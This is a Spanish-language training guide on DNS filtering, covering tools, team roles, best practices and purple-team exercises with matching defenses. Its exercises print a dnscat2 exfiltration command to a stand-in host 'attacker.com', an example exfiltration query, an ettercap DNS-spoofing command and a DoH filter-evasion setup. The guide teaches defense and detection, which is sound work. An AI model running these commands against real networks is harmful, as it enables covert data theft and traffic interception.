Filtrado de DNS

1️. Explicación en Profundidad del Concepto

¿Qué es el filtrado de DNS?

DNS Filtering – Filtrado de DNS
Es una técnica de seguridad que impide que los dispositivos resuelvan dominios maliciosos o no permitidos, bloqueando así el acceso a sitios dañinos antes de que se establezca la conexión. Opera interceptando las consultas DNS y comparándolas contra una lista de políticas o reputación.

¿Cómo funciona?

1. Un usuario intenta acceder a example.com.

2. Su sistema solicita la IP al servidor DNS.

3. El filtro de DNS intercepta esa solicitud.

4. Si example.com está en una lista negra (blacklist), la resolución se bloquea o se redirige a una página de advertencia.

¿Por qué es importante en arquitectura de seguridad?

• Previene el acceso a contenido malicioso sin depender de antivirus.

• Protege incluso dispositivos que no pueden tener agentes de seguridad instalados (IoT, impresoras, etc.).

• Sirve como control de frontera para navegación segura.

📖 Analogía realista:

Imagina que el DNS es como una central telefónica.
Cuando quieres llamar a alguien (dominio), pides su número.
El filtrado DNS es como tener una secretaria que dice:
"Lo siento, ese contacto está en la lista negra. No puedes llamarlo."

2️. Ejemplos Prácticos

• En empresas: se bloquean dominios de phishing conocidos y sitios de contenido no permitido (ej. redes sociales, juegos).

• En escuelas: se filtra contenido adulto o peligroso.

• En gobiernos: se bloquean dominios de espionaje extranjero o malware avanzado.

• En infraestructuras críticas: protege dispositivos ICS/SCADA que no tienen defensa local.

• Durante un incidente: el SOC puede agregar rápidamente un dominio malicioso recién detectado para evitar su propagación.

3️. Herramientas y Soluciones Reales

Herramienta / Servicio Uso principal - Nivel técnico

• Cisco Umbrella (OpenDNS) Cloud DNS con reputación global y categorías Empresarial / Avanzado
• Quad9 DNS gratuito con filtrado automático Básico / Hogar
• Pi-hole DNS local con bloqueador de publicidad Hogar / Lab
• ADGuard Home DNS + control parental + seguridad Hogar / Intermedio
• BIND con RPZ Servidor DNS con listas negras personalizadas Corporativo / Experto
• Cloudflare DNS + Gateway DNS rápido + filtrado + logs Empresarial

Cada herramienta puede integrarse con firewalls, proxies o soluciones EDR para reforzar la arquitectura de defensa.

4️. Visión Estratégica: ¿Qué hace cada equipo?

🔴 Red Team

• Técnicas de evasión:

  • Usar dominios recién registrados (fresh domains).

  • DNS over HTTPS (DoH) para evitar inspección.

  • Túneles de exfiltración mediante DNS (dnscat2, iodine, dns2tcp).

• Objetivo: Saltar controles, ocultar tráfico, extraer datos por canales no controlados.

🔵 Blue Team

• Controles clave:

  • Aplicar filtrado DNS a todos los dispositivos, incluidos móviles e IoT.

  • Bloquear dominios por reputación, categorías y listas internas.

  • Inspeccionar tráfico DNS saliente (incluso cifrado).

  • Usar logs DNS en SIEM para detectar anomalías (ej. dominios con nombres aleatorios).

• Reacción ante evasión:

  • Bloquear DoH/DoT.

  • Activar detección de tunneling DNS.

🟣 Purple Team

• Colabora en pruebas y mejoras:

  • Simula túneles DNS para validar SIEM y firewalls.

  • Evalúa si los dominios recién creados son bloqueados.

  • Refina políticas: ¿se bloquean dominios sin reputación? ¿cómo se comporta Pi-hole frente a ataques DNS de C2?

  • Documenta cómo responde la arquitectura a bypass avanzados.

5️. Resumen

Los servicios de filtrado de DNS son una defensa proactiva y estratégica en la arquitectura de seguridad. Bloquean el acceso a dominios maliciosos antes de que se establezca la conexión, evitando infecciones, phishing y exfiltración.
Son fáciles de implementar, compatibles con redes grandes o pequeñas y se pueden reforzar con herramientas de código abierto o servicios empresariales.
Desde la perspectiva Purple, es fundamental testear, ajustar y supervisar estos controles para cerrar brechas de evasión y mantener la protección actualizada.

6. Conceptos Clave

DNS – Domain Name System – Sistema que traduce nombres de dominio legibles (como google.com) a direcciones IP.

DNS Filtering – Filtrado DNS – Técnica de seguridad para bloquear o permitir la resolución de dominios basada en políticas.

RPZ – Response Policy Zone – Zona DNS que define reglas de respuesta ante consultas específicas (listas negras, redirecciones, etc.).

Pi-hole – Pi-hole DNS sinkhole – Herramienta de código abierto que actúa como servidor DNS con filtrado y bloqueo de publicidad.

DoH – DNS over HTTPS – Protocolo que cifra consultas DNS usando HTTPS.

DoT – DNS over TLS – Variante que cifra DNS sobre TLS (puerto 853).

DNSSEC – Domain Name System Security Extensions – Extensiones de seguridad DNS que permiten validar la autenticidad de las respuestas DNS mediante firmas digitales.

Zone Transfer – Transferencia de zona – Acción de replicar registros completos DNS entre servidores, puede ser usada por atacantes para mapear una red.

BIND – Berkeley Internet Name Domain – Uno de los servidores DNS más usados en el mundo.

Claves Estratégicas y Curiosidades sobre el Filtrado de DNS

🧨 1. El 90% del malware usa DNS en algún punto

DNS no solo es un servicio de red: es el punto débil favorito de muchos ataques.

• Casi todos los ransomware, spyware y backdoors hacen una consulta DNS antes de infectar.

• El C2 (Command & Control) muchas veces se basa en nombres de dominio dinámicos.

• Un malware puede "preguntar" por abc123.malwaredomain.com para recibir órdenes codificadas.

🔍 Conclusión: si no se monitoriza el DNS, se navega a ciegas.

🛰️ 2. Exfiltración de datos vía DNS es real y silenciosa

Herramientas como iodine, dns2tcp, dnscat2 permiten extraer información usando peticiones DNS.

Ejemplo:
Un atacante hace que tu sistema envíe esta consulta:

CopiarEditarpassword1234.myexfil.attacker.com

Su servidor DNS decodifica esos datos y guarda la información.

🧠 ¿Por qué es peligroso?

• El tráfico DNS suele estar permitido incluso en redes restringidas.

• Muchos SIEMs no analizan el contenido de las consultas.

💡 3. Pi-hole + DNS over HTTPS = filtrado en dispositivos móviles

Una Raspberry Pi con Pi-hole + Cloudflared como DoH Proxy permite que los móviles usen filtrado seguro incluso en 4G/5G o Wi-Fi públicas.

• Muy útil para proteger a empleados remotos o dispositivos BYOD.

• También puedes aplicarlo en el hogar para crear una red doméstica segura y educativa.

🛑 4. DNSSEC no protege contra malware

➡️ Falsa creencia: "Uso DNSSEC, ya estoy seguro".
❌ Error: un dominio con DNSSEC puede igualmente servir malware o ser usado para phishing.

🔒 5. DoH y DoT pueden romper tu visibilidad

• Esto cifra las consultas DNS, impidiendo que tu firewall o SIEM vea a qué dominios se accede.

• Aunque mejora la privacidad, reduce tu capacidad de monitoreo empresarial.

🎯 Solución Blue Team:

• Forzar uso de DNS locales mediante políticas (GPO).

• Bloquear puertos 853 (DoT) y 443 hacia resolvers conocidos (Cloudflare, Google, etc.).

• Usar soluciones empresariales que soporten DoH gestionado.

🔥 6. No solo se trata de bloquear: también se trata de ver

Oportunidades de mejora:

• Analiza qué dispositivos hacen muchas consultas fallidas.

• Detecta acceso a dominios con patrones sospechosos (ej. nombres aleatorios: xkfj38slq.com).

• Genera alertas SIEM si alguien intenta resolver dominios marcados como C2.

🧩 7. Filtrado DNS ≠ seguridad total

• Cambiar el servidor DNS del equipo.

• Usar una VPN para evadir los filtros.

• Montar un DNS local (DNS rebinding).

🛡️ Por eso:

• Configura el DNS en el firewall o switch.

• Restringe el cambio de DNS mediante políticas.

• Usa DNS interno como default, y bloquea salidas DNS externas.

📋 8. Errores comunes en producción

• No bloquear DoH/DoT Pérdida de visibilidad total del tráfico DNS
• No loguear DNS Sin trazabilidad ni detección temprana
• Usar solo listas públicas Falsos negativos si el dominio aún no fue clasificado
• No actualizar Pi-hole / filtros Dominio malicioso nuevo puede colarse
• Permitir zona transfer (AXFR) sin control Exposición completa del mapa de red interna

🛠️ 9. DNS también se puede atacar

• 2019 – Sea Turtle Campaign: atacantes modificaron registros DNS para interceptar correos de gobiernos y ONGs.

• DNS Cache Poisoning: el atacante envía respuestas falsas al resolver DNS para redirigir al usuario a otro sitio.

• Typosquatting DNS: crear dominios similares a los legítimos (goog1e.com) para engañar usuarios.

✅ Buenas Prácticas para Filtrado DNS Seguro

• Configura filtros basados en categorías (malware, phishing, pornografía, etc.).

• Mantén los filtros y listas negras siempre actualizados.

• Usa herramientas como Pi-hole o servicios empresariales como Cisco Umbrella.

• Bloquea DNS externos en el firewall; fuerza el uso de tus resolvers.

• Monitorea logs DNS en el SIEM.

• Bloquea o inspecciona tráfico DoH y DoT.

• Deshabilita transferencias de zona (AXFR) a destinos no autorizados.

• Habilita DNSSEC solo si sabes implementarlo correctamente y monitorizarlo.

• Integra tu política DNS con tu política DLP y Zero Trust.

🧪 EJERCICIOS PURPLE TEAM - Filtrado de DNS

⚔️ Ejemplo 1 – Ataque: Exfiltración de datos vía DNS

Nivel Avanzado

🔴 Red Team ataca:

• Herramienta: dnscat2

• Objetivo: Extraer una lista de usuarios desde una máquina comprometida, usando DNS como canal encubierto.

# Máquina atacante: dnscat2-server.rb # Máquina víctima (ya comprometida): dnscat --dns server=attacker.com --secret mysecret

🔵 Blue Team defiende:

• Detecta anomalías en las consultas DNS usando SIEM (por ejemplo, Splunk o Wazuh).

• Crea una regla de detección: "Más de 50 consultas DNS a subdominios aleatorios en menos de 1 minuto".

• Implementa bloqueo de dominios dinámicos y consultas sospechosas.

🟣 Purple Team coordina:

• Valida que las alertas se generen correctamente.

• Automatiza la respuesta: cuando se detecta este patrón → alerta + bloqueo del cliente en el firewall.

• Documenta la prueba y afina el playbook de exfiltración DNS.

✅ Resultado esperado: La técnica de exfiltración es identificada, detenida, y se integra como caso de uso en el SIEM.

⚔️ Ejemplo 2 – Ataque: Redirección DNS (DNS Poisoning)

Nivel Experto

🔴 Red Team ataca:

• Escenario: el atacante compromete un servidor DNS interno mal configurado.

• Ejecuta un ataque de DNS Cache Poisoning con ettercap, haciendo que todas las solicitudes a intranet.empresa.com se redirijan a su servidor malicioso.

# Ettercap + DNS Spoof plugin ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /victima/ /gateway/

🔵 Blue Team defiende:

• Revisa los logs de resolución DNS y detecta respuestas inconsistentes.

• Habilita DNSSEC en los servidores críticos.

• Aplica ACL para evitar transferencias de zona y asegura los registros del servidor DNS.

🟣 Purple Team coordina:

• Lanza simulaciones controladas de cache poisoning y mide el tiempo de detección.

• Corrige debilidades del DNS interno: configura correctamente el DNS recursivo y desactiva respuestas autoritativas incorrectas.

• Valida que las soluciones (como DNSSEC o segmentación) bloquean el ataque.

✅ Resultado esperado: El ataque es identificado en menos de 5 minutos, se mitiga la propagación y se documenta como incidente de alto riesgo.

⚔️ Ejemplo 3 – Ataque: Acceso a dominios prohibidos usando DNS sobre HTTPS (DoH)

Nivel Maestro

🔴 Red Team ataca:

• Usa cloudflared o Firefox con DoH activado para burlar los filtros DNS empresariales.

• Accede a malwaredomain.com sin que el proxy o firewall lo detecte.

bashCopiarEditar# Montar proxy DoH cloudflared proxy-dns # Navegar a dominio malicioso firefox → Config → Network → Enable DNS over HTTPS

🔵 Blue Team defiende:

• Bloquea puertos 443 hacia 1.1.1.1, 8.8.8.8, dns.google, etc.

• En GPO/MDM, desactiva DoH en navegadores empresariales.

• En el SIEM, crea alertas para intentos de conexión DoH.

🟣 Purple Team gestiona:

• Supervisa qué dispositivos están intentando usar DoH.

• Coordina campañas de concienciación para evitar su uso fuera de política.

• Refuerza la arquitectura: obliga a usar resolvers DNS internos controlados + monitoreo activo.

✅ Resultado esperado: El intento de evasión se detecta, bloquea y el evento se convierte en un caso de referencia para educación y auditoría interna.

📘 BONUS: Misión Purple de Integración

🎯 Reto extra:

1. Implementa Pi-hole + DNSSEC + logs hacia un SIEM (por ejemplo, Wazuh).

2. Simula una resolución DNS maliciosa (example.bad-dns.com).

3. Verifica si el SIEM la detecta.

4. Automatiza el bloqueo del origen (IP) vía firewall.

Puntos Clave Finales

• El DNS es uno de los vectores más utilizados para C2, evasión y exfiltración.

• Su protección requiere tanto filtrado como observabilidad profunda.

• El filtrado de DNS es parte fundamental de la estrategia Zero Trust.